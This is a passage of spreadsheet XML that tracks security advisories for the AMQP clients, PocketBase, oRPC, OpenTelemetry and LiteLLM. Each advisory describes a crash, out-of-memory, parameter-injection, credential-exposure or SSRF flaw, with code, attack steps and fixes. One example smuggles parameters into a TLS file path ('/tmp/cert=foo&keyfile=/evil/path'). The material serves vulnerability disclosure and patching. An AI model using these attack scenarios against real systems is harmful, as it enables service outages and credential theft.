      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr"/>
      <c r="P66" s="5" t="inlineStr"/>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>**Summary**
A vulnerability in the readField function allows a malicious or compromised AMQP server to trigger an unhandled runtime panic in the client application, leading to an immediate crash of the entire process.
**Details**
When parsing incoming AMQP frames, the `readField` function processes byte-array fields (type tag `'x'`) by reading a 32-bit big-endian integer to determine the length of the data payload.
```go
// read.go:253-263
case 'x':
    var len int32
    if err = binary.Read(r, binary.BigEndian, &amp;len); err != nil {
        return nil, err
    }
    value := make([]byte, len)  // PANICS if len &lt; 0
```
If a server transmits a length value of `0xFFFFFFFF`, it is interpreted by the client as a signed 32-bit integer with a value of `-1`. Passing a negative integer to Go's built-in make() function for slice allocation triggers an unrecoverable runtime panic (panic: len out of range).
Because the reader goroutine handles network I/O without an explicit recover() wrapper, this panic propagates up to the runtime root, abruptly terminating the host application.
**Attack Vector / Exploitation Scenario**
An attacker capable of spoofing, compromising, or controlling an AMQP broker can exploit this flaw during two primary phases:
1. Connection Establishment: Sending a malicious connection.start handshake frame containing server-properties with an 'x' type field assigned a negative length.
2. Message Delivery: Delivering a message payload where the header table contains a malformed field matching the criteria above.
**Impact**
Availability: High. A single malformed frame can reliably crash the client process, resulting in a persistent Denial of Service (DoS) if the client automatically reconnects and receives the same payload.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77412</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75516</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr">
        <is>
          <t>maven:com.rabbitmq:amqp-client</t>
        </is>
      </c>
      <c r="M67" s="5" t="inlineStr">
        <is>
          <t>5.34.0</t>
        </is>
      </c>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr"/>
      <c r="P67" s="5" t="inlineStr"/>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>## Vulnerability
In `AMQConnection.java` (line 435-436), after `Connection.Tune` negotiation, the frame-max limit is set via:
```java
_frameHandler.setFrameMax(
    Math.min(this.maxInboundMessageBodySize, frameMax));
```
When `frameMax = 0` (meaning "unlimited" per AMQP spec), `Math.min(67108864, 0) = 0`. This value is then passed to `Utils.framePayloadLimit(0)` which returns `Integer.MAX_VALUE` (line 77-79 of Utils.java):
```java
static int framePayloadLimit(int frameMax) {
    if (frameMax &lt;= 0) {
      return Integer.MAX_VALUE;
    }
    // ...
}
```
This completely defeats the `maxInboundMessageBodySize` protection (default 64MB) at the frame level.
## Attack Scenario
A malicious AMQP server (or MITM) sends `Connection.Tune` with `frameMax=0`:
1. Client defaults: `requestedFrameMax = 0` (`ConnectionFactory.DEFAULT_FRAME_MAX`, line 82)
2. `negotiatedMaxValue(0, 0)` = `Math.max(0, 0)` = 0 (line 673-676)
3. `Math.min(maxInboundMessageBodySize, 0)` = 0 — **64MB cap defeated**
4. `framePayloadLimit(0)` = `Integer.MAX_VALUE` — no frame size enforcement
5. Attacker sends a single frame with `frameSize = 0x1FFFFFFF` (~500MB)
6. `Frame.readFrom()` (line 135) executes `new byte[frameSize]` — **OOM crash**
The frame does not need to be a body frame — method frames, header frames, or heartbeat frames with a crafted size field all trigger the allocation before any content-level check fires.
## Root Cause
The AMQP spec uses `frameMax=0` to mean "unlimited", but `Math.min` treats it as the integer value zero. The intent of line 435-436 was to take the smaller of the two limits, but when one limit uses 0-means-unlimited semantics, `Math.min` always selects the zero, disabling the other limit.
## Impact
- **Default configuration is vulnerable**: Both `requestedFrameMax` (client) and legitimate servers' `frameMax` in Tune may be 0
- **Single-frame OOM**: One malicious frame triggers up to ~2GB allocation (`Integer.MAX_VALUE` bytes)
- **Bypasses existing protection**: `maxInboundMessageBodySize` (introduced to cap allocations at 64MB) is entirely defeated at the frame level
- **Different from ValueReader OOM**: This is a frame-layer allocation in `Frame.readFrom()`, not a value-layer allocation in `ValueReader.readBytes()`
## Affected Code
- `AMQConnection.java:435-436` — `Math.min` with 0-means-unlimited
- `Utils.java:77-79` — `framePayloadLimit(0)` returns `Integer.MAX_VALUE`
- `Frame.java:135` — `new byte[frameSize]` allocation site
- `ConnectionFactory.java:82` — `DEFAULT_FRAME_MAX = 0`
## Suggested Fix
```java
int effectiveFrameMax = (frameMax == 0)
    ? this.maxInboundMessageBodySize
    : Math.min(this.maxInboundMessageBodySize, frameMax);
_frameHandler.setFrameMax(effectiveFrameMax);
```
This treats `frameMax=0` as "use maxInboundMessageBodySize as the cap" instead of "zero".</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75516</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77404</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M68" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr"/>
      <c r="P68" s="5" t="inlineStr"/>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>## Summary
A query parameter injection vulnerability exists in the AMQP client's connection URI formatting logic. When generating or parsing connection URIs, TLS-related filesystem paths (such as certificates or keys) are appended directly to the URI's query string using string concatenation rather than secure URL encoding via functions like `url.QueryEscape`.
If an application handles a TLS file path containing special character delimiters (such as `&amp;` or `=`), these characters are interpreted as parameter separators by the URI parser. If the resulting `URI.String()` output is subsequently re-parsed via `ParseURI`, the injected fields can silently overwrite or hijack critical configuration parameters, forcing the client to use arbitrary connection settings or alternate TLS files.
---
## Vulnerability Details
### Mechanism
The vulnerability lies within the lack of proper escaping when compiling connection string components into a raw URL format:
```go
// Example of insecure string concatenation during URI building
uri := fmt.Sprintf("amqps://user:pass@host/%s?certfile=%s&amp;keyfile=%s", vhost, certPath, keyPath)
```
Because `certPath` and `keyPath` are not passed through `url.QueryEscape`, special URL characters preserve their control meanings. For instance, if a user supply a certificate path named:
`/tmp/cert=foo&amp;keyfile=/evil/path`
The generated string translates into:
`...?certfile=/tmp/cert=foo&amp;keyfile=/evil/path&amp;keyfile=/original/path`
When this string passes back through `ParseURI` (common in connection re-dial routines or configuration replication steps), standard URL parsing mechanics treat the string as multiple distinct parameters. Depending on map assignment order inside the parser, the injected keys take precedence over the original parameters.
### Impact
By manipulating the file paths used for TLS assets, an attacker or compromised local sub-system can:
* Inject arbitrary alternative options or override protocol settings.
* Substitute or switch keyfiles, leading to connection failures or the parsing of unauthorized cryptographic assets.
* Corrupt connection state variables, triggering application-layer failures during connection setup or recovery.
---
## Attack Vector
An attacker who has partial control over directory naming conventions or environmental variables used to specify local infrastructure paths can execute a parameter injection attack:
1. **Path Creation:** An attacker sets up a path containing deliberate URL parameter delimiters (e.g., `/var/lib/certs/client.crt?cacertfile=/tmp/fake_ca.crt&amp;`).
2. **String Generation:** The application serializes the active connection state or passes the paths down to an unescaped URI builder function.
3. **Configuration Hijack:** The URI string is generated with the injected parameter embedded into the query structure. When the client attempts to reuse or re-parse this connection string during a connection retry or worker spin-up, it parses the injected `cacertfile` parameter, loading a different, unverified Certificate Authority string.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77404</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82410</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr">
        <is>
          <t>go:github.com/pocketbase/pocketbase</t>
        </is>
      </c>
      <c r="M69" s="5" t="inlineStr">
        <is>
          <t>0.22.48, 0.39.7</t>
        </is>
      </c>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr"/>
      <c r="P69" s="5" t="inlineStr"/>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>PocketBase already has builtin panic-recover middleware for the regular requests handling but it doesn't cover panics in internal child/worker goroutines which in some situations could cause termination of the server process.
To prevent this from hapenning all existing internal worker functions were wrapped with the new helper `routine.SafeWrap(f)` _(auto recovers and returns any eventual panic as regular error)_.
The vulnerability was reported by @gigioneggiando and it is strongly recommended to upgrade to PocketBase **[v0.39.7](https://github.com/pocketbase/pocketbase/releases/tag/v0.39.7)** _(the fix was also backported in [v0.22.48](https://github.com/pocketbase/pocketbase/releases/tag/v0.22.48) in case you are using older PocketBase &lt; v0.23.0)_.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82410</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77406</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M70" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr"/>
      <c r="P70" s="5" t="inlineStr"/>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>## Summary
A logic and resource exhaustion vulnerability exists in the AMQP client's Quality of Service (`Qos`) configuration method. The `Qos` function accepts signed integers (`int`) for the `prefetchCount` and `prefetchSize` parameters but casts them directly to unsigned integers (`uint16` and `uint32`, respectively) when formatting the wire-level frame.
If a developer passes a negative integer (such as `-1`) to these parameters—frequently intended as a sentinel value meaning "no change" or "no limit"—the application performs an implicit signed-to-unsigned conversion. This wraps the values to their absolute maximum limit ($65535$ and $4294967295$). Consequently, a consumer expecting restricted message delivery rates is suddenly flooded with an unlimited volume of messages, potentially exhausting memory resources and crashing the application.
---
## Vulnerability Details
### Mechanism
The bug manifests during the structural assignment inside the channel's `Qos` method:
```go
// channel.go:795-796
PrefetchCount: uint16(prefetchCount),  // -1 wraps to 65535
PrefetchSize:  uint32(prefetchSize),   // -1 wraps to 4294967295
```
In Go, converting a negative signed integer to an unsigned integer shifts the value via two's complement arithmetic. Because no boundary validation or signedness check occurs prior to the cast:
* Passing `-1` for `prefetchCount` yields a wire value of `65535`.
* Passing `-1` for `prefetchSize` yields a wire value of `4294967295`.
### Impact
The AMQP broker interprets a `prefetch-count` of `65535` as an instruction to dispatch messages to the consumer with virtually no concurrency limits. 
If the application is processing heavy payloads or relies on strict rate-limiting to maintain stability, this unexpected flood will cause rapid heap memory growth, unmanageable processing queues, and an eventual Out-Of-Memory (OOM) termination.
---
## Attack Vector
An attacker who can manipulate configuration files, environmental variables, or API inputs that dictate client Qos settings can trigger an application-layer Denial of Service:
1. **Malicious Input:** An attacker sets a service's prefetch configuration parameter to `-1`.
2. **Implicit Overflow:** The application initializes the channel, executes `Qos(-1, ...)`, and transmits an unintended maximum-capacity request to the RabbitMQ/AMQP broker.
3. **Consumer Exhaustion:** The broker flushes the entire contents of the queue directly into the client consumer's network buffer, bypassing expected application concurrency barriers and inducing a crash.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77406</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77407</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M71" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr"/>
      <c r="P71" s="5" t="inlineStr"/>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-316</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>## Summary
An information disclosure vulnerability exists in the AMQP client implementation's authentication handling configuration. Following a successful connection handshake, the `Connection.Config.SASL` field stores the `Authentication` implementation state used to establish the session. 
For standard `PLAIN` authentication, this state utilizes the `PlainAuth` struct, which defines both `Username` and `Password` as publicly exported, plaintext string fields. Because this sensitive data is retained permanently in-memory within an exported field structure, any peripheral code, internal package, reflective logger, dependency, or automated debugging utility with access to the core `*Connection` object can read and expose the raw credentials.
---
## Vulnerability Details
### Mechanism
The vulnerability stems from the structural design of the configuration storage used during and after the AMQP handshake:
```go
// auth.go:21-23
type PlainAuth struct {
    Username string
    Password string  // exported plaintext
}
```
When an application initializes a connection, the `PlainAuth` object is deeply nested inside the configuration structure (`Connection.Config`). Even after the handshake concludes and authentication is complete, this structure persists natively in-memory for the duration of the network connection's lifecycle. 
Because `Password` is an exported string field, standard automated inspection mechanisms can read its value without restriction.
### Affected Code Paths &amp; Integrations
Any sub-component or library that traverses or reads the `*Connection` object will inadvertently read the plaintext password, including:
* **Reflective Loggers:** Structured logging frameworks that serialize nested configuration structs into JSON/Log formats.
* **APM &amp; Performance Agents:** Automated telemetry or Application Performance Monitoring tools that capture state snapshots.
* **Debugging &amp; Panic Handlers:** Mid-tier software or dump libraries designed to capture goroutine state or print deep struct hierarchies upon program errors or signals.
### Impact
The credential remains vulnerable to leak paths into logging pipelines, log aggregators, security information and event management (SIEM) systems, or standard output. Once transmitted to external log infrastructure, these credentials become accessible to unprivileged operators or any actor with access to log archives.
---
## Attack Vector
An attacker does not necessarily need direct remote code execution to exploit this flaw; instead, the vulnerability acts as a credential harvesting vector inside multi-tenant environments or via secondary log exposure:
1. **Configuration Dump:** An operator configures a standard reflective logger or third-party APM package to capture system state parameters, including the active AMQP `*Connection` object.
2. **Reflective Access:** The inspection engine uses Go's `reflect` package to walk the structural hierarchy, pulling the string value from `Connection.Config.SASL.(*PlainAuth).Password`.
3. **Exfiltration:** The plaintext password is written to standard system logs, which are then scraped into shared logging aggregators, exposing production infrastructure credentials to a wider audience.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77407</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77360</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr">
        <is>
          <t>npm:@orpc/server</t>
        </is>
      </c>
      <c r="M72" s="5" t="inlineStr">
        <is>
          <t>1.14.8</t>
        </is>
      </c>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr"/>
      <c r="P72" s="5" t="inlineStr"/>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-113</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>### Summary
A flaw in the CORS plugin allowed the incoming request's `Vary` header to be reflected into the response, letting a client influence a header that should be controlled solely by the server.
### Details
The CORS plugin previously copied the request's `Vary` header directly onto the response instead of treating `Vary` as a response-only header. Because `Vary` tells downstream caches and proxies how to key their cached responses, this allowed a client to inject arbitrary values into the response's `Vary` header, potentially distorting cache-key behavior in shared caches/CDNs sitting in front of an oRPC server and leading to inconsistent CORS enforcement for other clients.
Practical impact is limited to deployments where a shared cache or reverse proxy keys on the `Vary` header; the real-world effect depends on the caching layer's configuration.
### Impact
May cause cache key pollution and inconsistent CORS enforcement in setups that rely on shared/edge caches keying on `Vary`. No direct confidentiality, integrity, or availability impact in default (non-cached) configurations.
### Resolution
Update `@orpc/server` (and any other `@orpc/*` packages bundling the CORS plugin) to `1.14.8`. The CORS plugin now derives `Vary` exclusively from the response, appending `Origin` and preserving existing values instead of reflecting request headers.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77360</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81871</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr">
        <is>
          <t>go:go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc</t>
        </is>
      </c>
      <c r="M73" s="5" t="inlineStr">
        <is>
          <t>0.21.0</t>
        </is>
      </c>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr"/>
      <c r="P73" s="5" t="inlineStr"/>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-923</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>### Summary
The OTLP log gRPC exporter loads TLS settings from environment variables but does not apply them when creating gRPC transport credentials. Operators who rely on `OTEL_EXPORTER_OTLP_LOGS_CERTIFICATE`, `OTEL_EXPORTER_OTLP_CERTIFICATE`, or related client certificate variables for CA pinning or mTLS get a connection that falls back to system roots and omits the env-supplied client certificate. A network attacker who can intercept or spoof the collector connection with a system-trusted certificate can read or alter log telemetry. 
Introduced in commit: d99c76f
### Details
The affected code is in `exporters/otlp/otlplog/otlploggrpc`.
`newConfig` resolves env-based TLS configuration into `cfg.tlsCfg` at `exporters/otlp/otlplog/otlploggrpc/config.go:106-116`. The finding also identifies `loadEnvTLS` at `config.go:451-492` as the code that builds a `*tls.Config` containing `RootCAs` and client certificates from `OTEL_EXPORTER_OTLP[_LOGS]_CERTIFICATE` and `OTEL_EXPORTER_OTLP[_LOGS]_CLIENT_CERTIFICATE`/`KEY`.
However, `newGRPCDialOptions` in `exporters/otlp/otlplog/otlploggrpc/client.go:83-92` only checks `cfg.gRPCCredentials` and `cfg.insecure`. When neither is set, which is the normal env-only TLS configuration path, it uses `credentials.NewTLS(nil)`. That default trusts the host system root CAs and contains no env-supplied client certificate. The finding evidence reports no other `tlsCfg` use in the package, so env-based CA pinning and mTLS settings are loaded but not enforced.
### PoC
[validation-artifact.zip](https://github.com/user-attachments/files/27493589/validation-artifact.zip)
The validation artifact contains a ready-to-run test at `validation-artifact.zip:./poc_env_tls_ignored_test.go` and brief instructions at `validation-artifact.zip:./README.md`.
From a checkout of `pellared/opentelemetry-go` at commit `d99c76f`, with Go module dependencies available:
```sh
FINDING_DIR=/path/to/02-e6e2897a969c8191b260f243fbc99ebd-log-grpc-exporter-ignores-env-tls-certs-bypassing-mtls-pinning
cd /path/to/opentelemetry-go
git checkout d99c76f
tar -xOf validation-artifact.tar ./poc_env_tls_ignored_test.go &gt; exporters/otlp/otlplog/otlploggrpc/poc_env_tls_ignored_test.go
cd exporters/otlp/otlplog/otlploggrpc
GO111MODULE=on go test -v -run TestEnvTLSIgnored -count=1
```
The test generates a private CA and a TLS gRPC logs server certificate signed by that CA. It sets:
```sh
OTEL_EXPORTER_OTLP_LOGS_ENDPOINT=https://127.0.0.1:&lt;test-port&gt;
OTEL_EXPORTER_OTLP_LOGS_CERTIFICATE=&lt;temp-dir&gt;/ca.pem
```
Expected output includes an `unknown authority` failure for the first export call even though the env certificate points to the server CA, followed by a passing test after the same `cfg.tlsCfg` is explicitly wired through `WithTLSCredentials`:
```text
=== RUN   TestEnvTLSIgnored
    poc_env_tls_ignored_test.go:...: export error (expected due to ignored tlsCfg): ... x509: certificate signed by unknown authority
--- PASS: TestEnvTLSIgnored
PASS
```
This demonstrates that the env CA is parsed into `cfg.tlsCfg` but ignored by the default gRPC dial path.
### Impact
This is improper TLS certificate validation and endpoint authentication caused by ignoring configured trust material. Users of the OTLP log gRPC exporter who configure TLS, CA pinning, or mTLS through environment variables are impacted when they do not also supply explicit `WithTLSCredentials`. TLS still occurs with system roots, but the intended private CA pinning and client certificate authentication are bypassed. An attacker with a suitable network position and a system-trusted certificate for the collector endpoint can intercept or tamper with log telemetry that operators expected to be protected by the configured CA or mTLS policy.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81871</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59823</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr">
        <is>
          <t>pip:litellm</t>
        </is>
      </c>
      <c r="M74" s="5" t="inlineStr">
        <is>
          <t>1.83.9</t>
        </is>
      </c>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr"/>
      <c r="P74" s="5" t="inlineStr"/>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>### Summary
A server-side request forgery in LiteLLM Proxy lets an authenticated caller redirect the
proxy's outbound request to a host of their choosing by smuggling an `api_base` inside the
`user_config` request body, bypassing the existing parameter guard.
### Details
LiteLLM Proxy validates request bodies with `is_request_body_safe`, which blocks the
`api_base` and `base_url` parameters but does not cover `user_config`. The `user_config`
object is used to build the outbound router for a request, so a caller can place an
`api_base` inside it and reach an arbitrary host. The guard only inspected the two
top-level keys, so the same `api_base` nested inside `user_config` was never checked.
Exploitation requires a valid virtual key.
### Impact
An authenticated caller can make the proxy issue server-side requests to internal or
external hosts of their choosing, reaching endpoints the caller cannot otherwise access.
### Affected / Patched
Affected: `&lt;= 1.83.8`
Patched: `1.83.9`
### Remediation
Upgrade to 1.83.9 or later (released 2026-04-17).</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59823</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81870</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr">
        <is>
